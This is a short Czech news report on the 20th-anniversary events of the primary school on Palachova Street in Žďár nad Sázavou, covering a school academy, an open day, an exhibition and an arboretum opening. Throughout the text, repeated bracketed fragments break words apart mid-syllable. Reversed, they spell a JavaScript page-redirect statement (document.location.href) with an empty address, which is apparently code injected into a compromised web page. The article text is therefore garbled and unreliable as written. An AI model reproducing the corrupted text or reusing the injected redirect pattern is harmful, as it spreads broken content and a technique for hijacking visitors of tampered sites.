škola, výročí
Rainbow page separator

Škola v Palachově ulici začne slavit 20. výročí

Úterý, 18. listopadu 2014

ZŠ Palachova, Žďár nad Sázavou

Žďár nad Sázavou / Dvacáté výročí vzniku bude ve čtvrtek 20. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu slavit žďárská základní škola v Palachově ulici, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to školní akademií v Domě kultury. Ta začne od 16 hodin.
Další akce spojené s výročím dvou desetiletí existence školy, které souvisí s aktuálním školním rokem, se odehrají v následujících týdnech. Ve čtvrtek 27. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu se ve škole od 14 do 16 hodin uskuteční den otevřených dveří s programem pro veřejnost a od 16.30 hodin pak setkání s bývalými i současnými zaměstnanci vzdělávacího zařízení.
V průběhu prosince a ledna na zájemce čeká výstava fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografií a dokumentů z his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torie základní školy s názvem Jak šel čas ve žďárském divadle.
Oslavy jubilea vzdělávacího zařízení, které nyní navštěvuje na 470 žáků, se protáhnou do příštího kalendářního roku také spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovním dnem a slavnostním otevřením arboreta a učebny v přírodě. Ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to akce jsou naplánovány na pátek 29. května.

Zdroj: http://www.1zdar.cz/